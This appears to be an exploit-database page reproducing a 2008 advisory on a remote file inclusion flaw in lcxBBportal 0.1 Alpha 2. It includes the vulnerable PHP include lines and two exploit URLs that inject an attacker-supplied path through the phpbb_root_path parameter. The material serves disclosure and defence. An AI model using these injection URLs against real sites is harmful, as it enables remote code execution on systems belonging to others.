header-logo
Suggest Exploit
vendor:
lcxBBportal
by:
NoGe
7.5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: lcxBBportal
Affected Version From: 0.1 Alpha 2
Affected Version To: 0.1 Alpha 2
Patch Exists: NO
Related CWE: N/A
CPE: a:lcxbbportal:lcxbbportal:0.1_alpha_2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

lcxBBportal 0.1 Alpha 2 Remote File Inclusion Vulnerability

lcxBBportal version 0.1 Alpha 2 is vulnerable to Remote File Inclusion. The vulnerable files are portal/includes/portal_block.php and includes/acp/acp_lcxbbportal.php. An attacker can exploit this vulnerability by sending a malicious URL to the application. The malicious URL contains the path to the malicious file which will be included in the vulnerable file.

Mitigation:

The application should be configured to only include files from a trusted source. Input validation should also be used to ensure that the user supplied data is not malicious.
Source

Exploit-DB raw data:

=============================================================================================================


  [o] lcxBBportal 0.1 Alpha 2 Remote File Inclusion Vulnerability

       Software : lcxBBportal version 0.1 Alpha 2
       Vendor   : http://code.google.com/p/lcxbbportal/
       Download : http://code.google.com/p/lcxbbportal/downloads/list/lcxbbportal-0.1.A2.tar.gz
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com


=============================================================================================================


  [o] Vulnerable file

       portal/includes/portal_block.php

	include($phpbb_root_path . 'includes/bbcode.' . $phpEx);

       includes/acp/acp_lcxbbportal.php

	$phpbb_portal_path = $phpbb_root_path . 'portal/';
	require_once($phpbb_portal_path . 'includes/portal_block.' . $phpEx);
	require_once($phpbb_portal_path . 'includes/adm_portal_block.' . $phpEx);
	include($phpbb_root_path . 'includes/functions_display.' . $phpEx);



  [o] Exploit

       http://localhost/[path]/portal/includes/portal_block.php?phpbb_root_path=[evilcode]
       http://localhost/[path]/includes/acp/acp_lcxbbportal.php?phpbb_root_path=[evilcode]


=============================================================================================================


  [o] Greetz

       MainHack BrotherHood [ http://serverisdown.org/blog/]
       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
       H312Y yooogy mousekill }^-^{ kaka11 martfella
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke

       GANYANG MALINGSIAL!!! [ http://malingsial.serverisdown.org/ ]

        
=============================================================================================================

# milw0rm.com [2008-12-04]